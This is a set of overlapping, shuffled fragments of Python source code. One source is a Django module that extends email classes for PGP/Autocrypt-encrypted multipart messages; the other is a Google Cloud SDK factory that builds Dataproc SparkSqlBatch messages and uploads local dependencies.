"have to # accommodate that when doing comparisons. header_names = [key.lower() for key",
"# formatdate() uses stdlib methods to format the date, which use # the",
"cc=None, reply_to=None, keydata=None, pe=None): super(EmailMessagePGPAC, self).__init__( subject, body, from_email, to, bcc, connection, attachments,",
"'.join(map(force_text, self.cc)) if self.reply_to: msg['Reply-To'] = self.extra_headers.get( 'Reply-To', ', '.join(map(force_text, self.reply_to))) # Email",
"formatdate() uses stdlib methods to format the date, which use # the stdlib/OS",
"', '.join(map(force_text, self.to))) if self.cc: msg['Cc'] = ', '.join(map(force_text, self.cc)) if self.reply_to: msg['Reply-To']",
"self._create_message(msg) msg['Subject'] = self.subject msg['From'] = self.extra_headers.get('From', self.from_email) msg['To'] = self.extra_headers.get('To', ', '.join(map(force_text,",
"(juga at riseup dot net), under MIT license. \"\"\"Extend Django email classes for",
"vim:ts=4:sw=4:expandtab # Copyright 2017 juga (juga at riseup dot net), under MIT license.",
"container for encrypted email information.\"\"\" content_subtype = 'encrypted' mixed_subtype = '' def message(self):",
"From and To are already handled if name.lower() in ('from', 'to'): continue msg[name]",
"in header_names: # Use cached DNS_NAME for performance msg['Message-ID'] = make_msgid(domain=DNS_NAME) for name,",
"django.conf import settings from django.core.mail.message import ( EmailMessage, MIMEMixin, forbid_multi_line_headers, force_text, make_msgid, formatdate,",
"import ( EmailMessage, MIMEMixin, forbid_multi_line_headers, force_text, make_msgid, formatdate, DNS_NAME) from emailpgp.mime.multipartpgp import MIMEMultipartPGP",
"message(self, msg): self.msg = msg class EmailMessagePGP(EmailMessage): \"\"\"A container for encrypted email information.\"\"\"",
"which # will get picked up by formatdate(). msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME) if 'message-id'",
"<reponame>juga0/djac # -*- coding: utf-8 -*- # vim:ts=4:sw=4:expandtab # Copyright 2017 juga (juga",
"messages. \"\"\" __all__ = ['EmailMessageEnc', 'EmailMessagePGP'] from django.conf import settings from django.core.mail.message import",
"'EmailMessagePGP'] from django.conf import settings from django.core.mail.message import ( EmailMessage, MIMEMixin, forbid_multi_line_headers, force_text,",
"make_msgid, formatdate, DNS_NAME) from emailpgp.mime.multipartpgp import MIMEMultipartPGP from autocrypt.pgpymessage import gen_ac_header_dict class SafeMIMEMultipart(MIMEMixin,",
"self.encoding) MIMEMultipartPGP.__setitem__(self, name, val) class EmailMessageEnc(EmailMessage): def message(self, msg): self.msg = msg class",
"stdlib/OS concept of a timezone, however, Django sets the # TZ environment variable",
"value in self.extra_headers.items(): # From and To are already handled if name.lower() in",
"msg def EmailMessagePGPAC(EmailMessagePGP): def __init__(self, subject='', body='', from_email=None, to=None, bcc=None, connection=None, attachments=None, headers=None,",
"MIME multipart/pgp-encrypted type messages. \"\"\" __all__ = ['EmailMessageEnc', 'EmailMessagePGP'] from django.conf import settings",
"EmailMessageEnc(EmailMessage): def message(self, msg): self.msg = msg class EmailMessagePGP(EmailMessage): \"\"\"A container for encrypted",
"msg['Subject'] = self.subject msg['From'] = self.extra_headers.get('From', self.from_email) msg['To'] = self.extra_headers.get('To', ', '.join(map(force_text, self.to)))",
"date, which use # the stdlib/OS concept of a timezone, however, Django sets",
"methods to format the date, which use # the stdlib/OS concept of a",
"based on the TIME_ZONE setting which # will get picked up by formatdate().",
"msg['Message-ID'] = make_msgid(domain=DNS_NAME) for name, value in self.extra_headers.items(): # From and To are",
"Django email classes for MIME multipart/pgp-encrypted type messages. \"\"\" __all__ = ['EmailMessageEnc', 'EmailMessagePGP']",
"self.encoding = encoding MIMEMultipartPGP.__init__(self, _data, boundary, **_params) def __setitem__(self, name, val): name, val",
"MIMEMultipartPGP(self.body) # FIXME: attachments # msg = self._create_message(msg) msg['Subject'] = self.subject msg['From'] =",
"value return msg def EmailMessagePGPAC(EmailMessagePGP): def __init__(self, subject='', body='', from_email=None, to=None, bcc=None, connection=None,",
"return msg def EmailMessagePGPAC(EmailMessagePGP): def __init__(self, subject='', body='', from_email=None, to=None, bcc=None, connection=None, attachments=None,",
"EmailMessagePGPAC(EmailMessagePGP): def __init__(self, subject='', body='', from_email=None, to=None, bcc=None, connection=None, attachments=None, headers=None, cc=None, reply_to=None,",
"in self.extra_headers.items(): # From and To are already handled if name.lower() in ('from',",
"= encoding MIMEMultipartPGP.__init__(self, _data, boundary, **_params) def __setitem__(self, name, val): name, val =",
"= make_msgid(domain=DNS_NAME) for name, value in self.extra_headers.items(): # From and To are already",
"boundary, **_params) def __setitem__(self, name, val): name, val = forbid_multi_line_headers(name, val, self.encoding) MIMEMultipartPGP.__setitem__(self,",
"val = forbid_multi_line_headers(name, val, self.encoding) MIMEMultipartPGP.__setitem__(self, name, val) class EmailMessageEnc(EmailMessage): def message(self, msg):",
"utf-8 -*- # vim:ts=4:sw=4:expandtab # Copyright 2017 juga (juga at riseup dot net),",
"to=None, bcc=None, connection=None, attachments=None, headers=None, cc=None, reply_to=None, keydata=None, pe=None): super(EmailMessagePGPAC, self).__init__( subject, body,",
"headers=None, cc=None, reply_to=None, keydata=None, pe=None): super(EmailMessagePGPAC, self).__init__( subject, body, from_email, to, bcc, connection,",
"= self.extra_headers.get('From', self.from_email) msg['To'] = self.extra_headers.get('To', ', '.join(map(force_text, self.to))) if self.cc: msg['Cc'] =",
"license. \"\"\"Extend Django email classes for MIME multipart/pgp-encrypted type messages. \"\"\" __all__ =",
"not in header_names: # formatdate() uses stdlib methods to format the date, which",
"bcc=None, connection=None, attachments=None, headers=None, cc=None, reply_to=None, keydata=None, pe=None): super(EmailMessagePGPAC, self).__init__( subject, body, from_email,",
"to # accommodate that when doing comparisons. header_names = [key.lower() for key in",
"emailpgp.mime.multipartpgp import MIMEMultipartPGP from autocrypt.pgpymessage import gen_ac_header_dict class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP): def __init__(self, _data=None,",
"format the date, which use # the stdlib/OS concept of a timezone, however,",
"if self.reply_to: msg['Reply-To'] = self.extra_headers.get( 'Reply-To', ', '.join(map(force_text, self.reply_to))) # Email header names",
"class EmailMessageEnc(EmailMessage): def message(self, msg): self.msg = msg class EmailMessagePGP(EmailMessage): \"\"\"A container for",
"by formatdate(). msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME) if 'message-id' not in header_names: # Use cached",
"__all__ = ['EmailMessageEnc', 'EmailMessagePGP'] from django.conf import settings from django.core.mail.message import ( EmailMessage,",
"Copyright 2017 juga (juga at riseup dot net), under MIT license. \"\"\"Extend Django",
"are case-insensitive (RFC 2045), so we have to # accommodate that when doing",
"in header_names: # formatdate() uses stdlib methods to format the date, which use",
"# the stdlib/OS concept of a timezone, however, Django sets the # TZ",
"uses stdlib methods to format the date, which use # the stdlib/OS concept",
"msg['Reply-To'] = self.extra_headers.get( 'Reply-To', ', '.join(map(force_text, self.reply_to))) # Email header names are case-insensitive",
"self.from_email) msg['To'] = self.extra_headers.get('To', ', '.join(map(force_text, self.to))) if self.cc: msg['Cc'] = ', '.join(map(force_text,",
"and To are already handled if name.lower() in ('from', 'to'): continue msg[name] =",
"_data, boundary, **_params) def __setitem__(self, name, val): name, val = forbid_multi_line_headers(name, val, self.encoding)",
"2017 juga (juga at riseup dot net), under MIT license. \"\"\"Extend Django email",
"[key.lower() for key in self.extra_headers] if 'date' not in header_names: # formatdate() uses",
"__init__(self, _data=None, _subtype='encrypted', boundary=None, encoding=None, **_params): self.encoding = encoding MIMEMultipartPGP.__init__(self, _data, boundary, **_params)",
"self.reply_to: msg['Reply-To'] = self.extra_headers.get( 'Reply-To', ', '.join(map(force_text, self.reply_to))) # Email header names are",
"picked up by formatdate(). msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME) if 'message-id' not in header_names: #",
"self.extra_headers.items(): # From and To are already handled if name.lower() in ('from', 'to'):",
"# From and To are already handled if name.lower() in ('from', 'to'): continue",
"MIMEMultipartPGP.__init__(self, _data, boundary, **_params) def __setitem__(self, name, val): name, val = forbid_multi_line_headers(name, val,",
"= ', '.join(map(force_text, self.cc)) if self.reply_to: msg['Reply-To'] = self.extra_headers.get( 'Reply-To', ', '.join(map(force_text, self.reply_to)))",
"def __init__(self, subject='', body='', from_email=None, to=None, bcc=None, connection=None, attachments=None, headers=None, cc=None, reply_to=None, keydata=None,",
"(RFC 2045), so we have to # accommodate that when doing comparisons. header_names",
"import gen_ac_header_dict class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP): def __init__(self, _data=None, _subtype='encrypted', boundary=None, encoding=None, **_params): self.encoding",
"( EmailMessage, MIMEMixin, forbid_multi_line_headers, force_text, make_msgid, formatdate, DNS_NAME) from emailpgp.mime.multipartpgp import MIMEMultipartPGP from",
"under MIT license. \"\"\"Extend Django email classes for MIME multipart/pgp-encrypted type messages. \"\"\"",
"SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP): def __init__(self, _data=None, _subtype='encrypted', boundary=None, encoding=None, **_params): self.encoding = encoding MIMEMultipartPGP.__init__(self,",
"self.reply_to))) # Email header names are case-insensitive (RFC 2045), so we have to",
"DNS_NAME for performance msg['Message-ID'] = make_msgid(domain=DNS_NAME) for name, value in self.extra_headers.items(): # From",
"to format the date, which use # the stdlib/OS concept of a timezone,",
"= ['EmailMessageEnc', 'EmailMessagePGP'] from django.conf import settings from django.core.mail.message import ( EmailMessage, MIMEMixin,",
"-*- coding: utf-8 -*- # vim:ts=4:sw=4:expandtab # Copyright 2017 juga (juga at riseup",
"Django sets the # TZ environment variable based on the TIME_ZONE setting which",
"self.extra_headers.get('To', ', '.join(map(force_text, self.to))) if self.cc: msg['Cc'] = ', '.join(map(force_text, self.cc)) if self.reply_to:",
"# accommodate that when doing comparisons. header_names = [key.lower() for key in self.extra_headers]",
"not in header_names: # Use cached DNS_NAME for performance msg['Message-ID'] = make_msgid(domain=DNS_NAME) for",
"will get picked up by formatdate(). msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME) if 'message-id' not in",
"= formatdate(localtime=settings.EMAIL_USE_LOCALTIME) if 'message-id' not in header_names: # Use cached DNS_NAME for performance",
"reply_to=None, keydata=None, pe=None): super(EmailMessagePGPAC, self).__init__( subject, body, from_email, to, bcc, connection, attachments, headers,",
"def message(self, msg): self.msg = msg class EmailMessagePGP(EmailMessage): \"\"\"A container for encrypted email",
"msg = self._create_message(msg) msg['Subject'] = self.subject msg['From'] = self.extra_headers.get('From', self.from_email) msg['To'] = self.extra_headers.get('To',",
"message(self): encoding = self.encoding or settings.DEFAULT_CHARSET msg = MIMEMultipartPGP(self.body) # FIXME: attachments #",
"= self._create_message(msg) msg['Subject'] = self.subject msg['From'] = self.extra_headers.get('From', self.from_email) msg['To'] = self.extra_headers.get('To', ',",
"= self.extra_headers.get( 'Reply-To', ', '.join(map(force_text, self.reply_to))) # Email header names are case-insensitive (RFC",
"use # the stdlib/OS concept of a timezone, however, Django sets the #",
"timezone, however, Django sets the # TZ environment variable based on the TIME_ZONE",
"TIME_ZONE setting which # will get picked up by formatdate(). msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME)",
"performance msg['Message-ID'] = make_msgid(domain=DNS_NAME) for name, value in self.extra_headers.items(): # From and To",
"body='', from_email=None, to=None, bcc=None, connection=None, attachments=None, headers=None, cc=None, reply_to=None, keydata=None, pe=None): super(EmailMessagePGPAC, self).__init__(",
"\"\"\" __all__ = ['EmailMessageEnc', 'EmailMessagePGP'] from django.conf import settings from django.core.mail.message import (",
"val): name, val = forbid_multi_line_headers(name, val, self.encoding) MIMEMultipartPGP.__setitem__(self, name, val) class EmailMessageEnc(EmailMessage): def",
"gen_ac_header_dict class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP): def __init__(self, _data=None, _subtype='encrypted', boundary=None, encoding=None, **_params): self.encoding =",
"# msg = self._create_message(msg) msg['Subject'] = self.subject msg['From'] = self.extra_headers.get('From', self.from_email) msg['To'] =",
"', '.join(map(force_text, self.cc)) if self.reply_to: msg['Reply-To'] = self.extra_headers.get( 'Reply-To', ', '.join(map(force_text, self.reply_to))) #",
"MIMEMultipartPGP): def __init__(self, _data=None, _subtype='encrypted', boundary=None, encoding=None, **_params): self.encoding = encoding MIMEMultipartPGP.__init__(self, _data,",
"# vim:ts=4:sw=4:expandtab # Copyright 2017 juga (juga at riseup dot net), under MIT",
"if 'date' not in header_names: # formatdate() uses stdlib methods to format the",
"msg['Cc'] = ', '.join(map(force_text, self.cc)) if self.reply_to: msg['Reply-To'] = self.extra_headers.get( 'Reply-To', ', '.join(map(force_text,",
"msg['To'] = self.extra_headers.get('To', ', '.join(map(force_text, self.to))) if self.cc: msg['Cc'] = ', '.join(map(force_text, self.cc))",
"for performance msg['Message-ID'] = make_msgid(domain=DNS_NAME) for name, value in self.extra_headers.items(): # From and",
"EmailMessagePGP(EmailMessage): \"\"\"A container for encrypted email information.\"\"\" content_subtype = 'encrypted' mixed_subtype = ''",
"TZ environment variable based on the TIME_ZONE setting which # will get picked",
"To are already handled if name.lower() in ('from', 'to'): continue msg[name] = value",
"MIMEMultipartPGP from autocrypt.pgpymessage import gen_ac_header_dict class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP): def __init__(self, _data=None, _subtype='encrypted', boundary=None,",
"__setitem__(self, name, val): name, val = forbid_multi_line_headers(name, val, self.encoding) MIMEMultipartPGP.__setitem__(self, name, val) class",
"('from', 'to'): continue msg[name] = value return msg def EmailMessagePGPAC(EmailMessagePGP): def __init__(self, subject='',",
"\"\"\"A container for encrypted email information.\"\"\" content_subtype = 'encrypted' mixed_subtype = '' def",
"for name, value in self.extra_headers.items(): # From and To are already handled if",
"self.cc)) if self.reply_to: msg['Reply-To'] = self.extra_headers.get( 'Reply-To', ', '.join(map(force_text, self.reply_to))) # Email header",
"net), under MIT license. \"\"\"Extend Django email classes for MIME multipart/pgp-encrypted type messages.",
"= msg class EmailMessagePGP(EmailMessage): \"\"\"A container for encrypted email information.\"\"\" content_subtype = 'encrypted'",
"stdlib methods to format the date, which use # the stdlib/OS concept of",
"\"\"\"Extend Django email classes for MIME multipart/pgp-encrypted type messages. \"\"\" __all__ = ['EmailMessageEnc',",
"_data=None, _subtype='encrypted', boundary=None, encoding=None, **_params): self.encoding = encoding MIMEMultipartPGP.__init__(self, _data, boundary, **_params) def",
"doing comparisons. header_names = [key.lower() for key in self.extra_headers] if 'date' not in",
"django.core.mail.message import ( EmailMessage, MIMEMixin, forbid_multi_line_headers, force_text, make_msgid, formatdate, DNS_NAME) from emailpgp.mime.multipartpgp import",
"case-insensitive (RFC 2045), so we have to # accommodate that when doing comparisons.",
"formatdate(). msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME) if 'message-id' not in header_names: # Use cached DNS_NAME",
"key in self.extra_headers] if 'date' not in header_names: # formatdate() uses stdlib methods",
"Use cached DNS_NAME for performance msg['Message-ID'] = make_msgid(domain=DNS_NAME) for name, value in self.extra_headers.items():",
"super(EmailMessagePGPAC, self).__init__( subject, body, from_email, to, bcc, connection, attachments, headers, cc, reply_to) self.extra_headers",
"if self.cc: msg['Cc'] = ', '.join(map(force_text, self.cc)) if self.reply_to: msg['Reply-To'] = self.extra_headers.get( 'Reply-To',",
"msg = MIMEMultipartPGP(self.body) # FIXME: attachments # msg = self._create_message(msg) msg['Subject'] = self.subject",
"msg[name] = value return msg def EmailMessagePGPAC(EmailMessagePGP): def __init__(self, subject='', body='', from_email=None, to=None,",
"settings.DEFAULT_CHARSET msg = MIMEMultipartPGP(self.body) # FIXME: attachments # msg = self._create_message(msg) msg['Subject'] =",
"encoding MIMEMultipartPGP.__init__(self, _data, boundary, **_params) def __setitem__(self, name, val): name, val = forbid_multi_line_headers(name,",
"'date' not in header_names: # formatdate() uses stdlib methods to format the date,",
"'to'): continue msg[name] = value return msg def EmailMessagePGPAC(EmailMessagePGP): def __init__(self, subject='', body='',",
"so we have to # accommodate that when doing comparisons. header_names = [key.lower()",
"header_names: # formatdate() uses stdlib methods to format the date, which use #",
"2045), so we have to # accommodate that when doing comparisons. header_names =",
"type messages. \"\"\" __all__ = ['EmailMessageEnc', 'EmailMessagePGP'] from django.conf import settings from django.core.mail.message",
"DNS_NAME) from emailpgp.mime.multipartpgp import MIMEMultipartPGP from autocrypt.pgpymessage import gen_ac_header_dict class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP): def",
"formatdate, DNS_NAME) from emailpgp.mime.multipartpgp import MIMEMultipartPGP from autocrypt.pgpymessage import gen_ac_header_dict class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP):",
"__init__(self, subject='', body='', from_email=None, to=None, bcc=None, connection=None, attachments=None, headers=None, cc=None, reply_to=None, keydata=None, pe=None):",
"header_names = [key.lower() for key in self.extra_headers] if 'date' not in header_names: #",
"the date, which use # the stdlib/OS concept of a timezone, however, Django",
"from_email=None, to=None, bcc=None, connection=None, attachments=None, headers=None, cc=None, reply_to=None, keydata=None, pe=None): super(EmailMessagePGPAC, self).__init__( subject,",
"forbid_multi_line_headers, force_text, make_msgid, formatdate, DNS_NAME) from emailpgp.mime.multipartpgp import MIMEMultipartPGP from autocrypt.pgpymessage import gen_ac_header_dict",
"encoding=None, **_params): self.encoding = encoding MIMEMultipartPGP.__init__(self, _data, boundary, **_params) def __setitem__(self, name, val):",
"def message(self): encoding = self.encoding or settings.DEFAULT_CHARSET msg = MIMEMultipartPGP(self.body) # FIXME: attachments",
"from autocrypt.pgpymessage import gen_ac_header_dict class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP): def __init__(self, _data=None, _subtype='encrypted', boundary=None, encoding=None,",
"force_text, make_msgid, formatdate, DNS_NAME) from emailpgp.mime.multipartpgp import MIMEMultipartPGP from autocrypt.pgpymessage import gen_ac_header_dict class",
"**_params): self.encoding = encoding MIMEMultipartPGP.__init__(self, _data, boundary, **_params) def __setitem__(self, name, val): name,",
"# Email header names are case-insensitive (RFC 2045), so we have to #",
"= [key.lower() for key in self.extra_headers] if 'date' not in header_names: # formatdate()",
"sets the # TZ environment variable based on the TIME_ZONE setting which #",
"for MIME multipart/pgp-encrypted type messages. \"\"\" __all__ = ['EmailMessageEnc', 'EmailMessagePGP'] from django.conf import",
"encoding = self.encoding or settings.DEFAULT_CHARSET msg = MIMEMultipartPGP(self.body) # FIXME: attachments # msg",
"information.\"\"\" content_subtype = 'encrypted' mixed_subtype = '' def message(self): encoding = self.encoding or",
"environment variable based on the TIME_ZONE setting which # will get picked up",
"attachments=None, headers=None, cc=None, reply_to=None, keydata=None, pe=None): super(EmailMessagePGPAC, self).__init__( subject, body, from_email, to, bcc,",
"pe=None): super(EmailMessagePGPAC, self).__init__( subject, body, from_email, to, bcc, connection, attachments, headers, cc, reply_to)",
"the TIME_ZONE setting which # will get picked up by formatdate(). msg['Date'] =",
"content_subtype = 'encrypted' mixed_subtype = '' def message(self): encoding = self.encoding or settings.DEFAULT_CHARSET",
"self).__init__( subject, body, from_email, to, bcc, connection, attachments, headers, cc, reply_to) self.extra_headers =",
"# -*- coding: utf-8 -*- # vim:ts=4:sw=4:expandtab # Copyright 2017 juga (juga at",
"make_msgid(domain=DNS_NAME) for name, value in self.extra_headers.items(): # From and To are already handled",
"val, self.encoding) MIMEMultipartPGP.__setitem__(self, name, val) class EmailMessageEnc(EmailMessage): def message(self, msg): self.msg = msg",
"subject, body, from_email, to, bcc, connection, attachments, headers, cc, reply_to) self.extra_headers = self.extra_headers.update(",
"**_params) def __setitem__(self, name, val): name, val = forbid_multi_line_headers(name, val, self.encoding) MIMEMultipartPGP.__setitem__(self, name,"
] |
[
"SparkSqlBatch message.\"\"\" from __future__ import absolute_import from __future__ import division from __future__ import",
"raise AttributeError('--deps-bucket was not specified.') dependencies = local_file_uploader.Upload(args.bucket, dependencies) # Move main SQL",
"KIND, either express or implied. # See the License for the specific language",
"Unless required by applicable law or agreed to in writing, software # distributed",
"# Move main SQL script out of the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] #",
"params = args.vars if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies):",
"self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local files and creates a SparkSqlBatch",
"encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket is not",
"this file except in compliance with the License. # You may obtain a",
"-*- # # Copyright 2021 Google LLC. All Rights Reserved. # # Licensed",
"LLC. All Rights Reserved. # # Licensed under the Apache License, Version 2.0",
"specified. \"\"\" kwargs = {} dependencies = {} # Upload requires a list.",
"ANY KIND, either express or implied. # See the License for the specific",
"was not specified.') dependencies = local_file_uploader.Upload(args.bucket, dependencies) # Move main SQL script out",
"not specified. \"\"\" kwargs = {} dependencies = {} # Upload requires a",
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See",
"SparkSqlBatch message. Uploads user local files and change the URIs to local files",
"IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or",
"[args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars params =",
"args.vars: params = args.vars if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if",
"the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge the dictionaries first for compatibility. kwargs.update(dependencies)",
"args): \"\"\"Uploads local files and creates a SparkSqlBatch message. Uploads user local files",
"user local files and change the URIs to local files to uploaded URIs.",
"import unicode_literals from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc import",
"OF ANY KIND, either express or implied. # See the License for the",
"message instance. Raises: AttributeError: Bucket is required to upload local files, but not",
"utf-8 -*- # # Copyright 2021 Google LLC. All Rights Reserved. # #",
"bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket if not bucket:",
"# Cloud Storage bucket to upload workload dependencies. # It is required until",
"Creates a SparkSqlBatch message. Args: args: Parsed arguments. Returns: A SparkSqlBatch message instance.",
"of the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge the dictionaries first for compatibility.",
"args.vars if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket =",
"dictionaries first for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) #",
"dependencies = {} # Upload requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files:",
"division from __future__ import unicode_literals from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import flags",
"but not specified. \"\"\" kwargs = {} dependencies = {} # Upload requires",
"message.\"\"\" from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals",
"All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the",
"if args.script_variables: params = args.script_variables elif args.vars: params = args.vars if params: kwargs['queryVariables']",
"software # distributed under the License is distributed on an \"AS IS\" BASIS,",
"Merge the dictionaries first for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser)",
"SparkSqlBatchFactory(object): \"\"\"Factory class for SparkSqlBatch message.\"\"\" def __init__(self, dataproc): \"\"\"Factory class for SparkSqlBatch",
"# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to",
"UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local files and creates a SparkSqlBatch message. Uploads user local",
"SparkSqlBatch message. Args: dataproc: A Dataproc instance. \"\"\" self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self,",
"not None else args.bucket if not bucket: raise AttributeError('--deps-bucket was not specified.') dependencies",
"bucket to upload workload dependencies. # It is required until we figure out",
"compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket",
"limitations under the License. \"\"\"Factory class for SparkSqlBatch message.\"\"\" from __future__ import absolute_import",
"googlecloudsdk.command_lib.dataproc import local_file_uploader class SparkSqlBatchFactory(object): \"\"\"Factory class for SparkSqlBatch message.\"\"\" def __init__(self, dataproc):",
"under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES",
"from googlecloudsdk.command_lib.dataproc import local_file_uploader class SparkSqlBatchFactory(object): \"\"\"Factory class for SparkSqlBatch message.\"\"\" def __init__(self,",
"the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law",
"list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris'] =",
"\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express",
"params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if",
"from __future__ import division from __future__ import unicode_literals from apitools.base.py import encoding from",
"required by applicable law or agreed to in writing, software # distributed under",
"applicable law or agreed to in writing, software # distributed under the License",
"= dataproc def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local files and creates a SparkSqlBatch message.",
"class for SparkSqlBatch message. Args: dataproc: A Dataproc instance. \"\"\" self.dataproc = dataproc",
"local files to uploaded URIs. Creates a SparkSqlBatch message. Args: args: Parsed arguments.",
"bucket: raise AttributeError('--deps-bucket was not specified.') dependencies = local_file_uploader.Upload(args.bucket, dependencies) # Move main",
"a SparkSqlBatch message. Uploads user local files and change the URIs to local",
"or agreed to in writing, software # distributed under the License is distributed",
"the URIs to local files to uploaded URIs. Creates a SparkSqlBatch message. Args:",
"the dictionaries first for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser)",
"# # Copyright 2021 Google LLC. All Rights Reserved. # # Licensed under",
"to upload workload dependencies. # It is required until we figure out a",
"__future__ import absolute_import from __future__ import division from __future__ import unicode_literals from apitools.base.py",
"CONDITIONS OF ANY KIND, either express or implied. # See the License for",
"import flags from googlecloudsdk.command_lib.dataproc import local_file_uploader class SparkSqlBatchFactory(object): \"\"\"Factory class for SparkSqlBatch message.\"\"\"",
"SQL script out of the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge the dictionaries",
"= {} # Upload requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris']",
"\"\"\" self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local files and creates a",
"under the Apache License, Version 2.0 (the \"License\"); # you may not use",
"writing, software # distributed under the License is distributed on an \"AS IS\"",
"# -*- coding: utf-8 -*- # # Copyright 2021 Google LLC. All Rights",
"SparkSqlBatch message.\"\"\" def __init__(self, dataproc): \"\"\"Factory class for SparkSqlBatch message. Args: dataproc: A",
"You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #",
"self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to upload workload",
"local_file_uploader.Upload(args.bucket, dependencies) # Move main SQL script out of the list. dependencies['queryFileUri'] =",
"License. # You may obtain a copy of the License at # #",
"compliance with the License. # You may obtain a copy of the License",
"arguments. Returns: A SparkSqlBatch message instance. Raises: AttributeError: Bucket is required to upload",
"upload workload dependencies. # It is required until we figure out a place",
"dataproc: A Dataproc instance. \"\"\" self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local",
"Returns: A SparkSqlBatch message instance. Raises: AttributeError: Bucket is required to upload local",
"of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable",
"workload dependencies. # It is required until we figure out a place to",
"encoding from googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc import local_file_uploader class SparkSqlBatchFactory(object): \"\"\"Factory class",
"args.deps_bucket if args.deps_bucket is not None else args.bucket if not bucket: raise AttributeError('--deps-bucket",
"SparkSqlBatch message. Args: args: Parsed arguments. Returns: A SparkSqlBatch message instance. Raises: AttributeError:",
"for the specific language governing permissions and # limitations under the License. \"\"\"Factory",
"creates a SparkSqlBatch message. Uploads user local files and change the URIs to",
"if not bucket: raise AttributeError('--deps-bucket was not specified.') dependencies = local_file_uploader.Upload(args.bucket, dependencies) #",
"2021 Google LLC. All Rights Reserved. # # Licensed under the Apache License,",
"not use this file except in compliance with the License. # You may",
"local files and change the URIs to local files to uploaded URIs. Creates",
"from googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc import local_file_uploader class SparkSqlBatchFactory(object): \"\"\"Factory class for",
"local_file_uploader class SparkSqlBatchFactory(object): \"\"\"Factory class for SparkSqlBatch message.\"\"\" def __init__(self, dataproc): \"\"\"Factory class",
"upload local files, but not specified. \"\"\" kwargs = {} dependencies = {}",
"License, Version 2.0 (the \"License\"); # you may not use this file except",
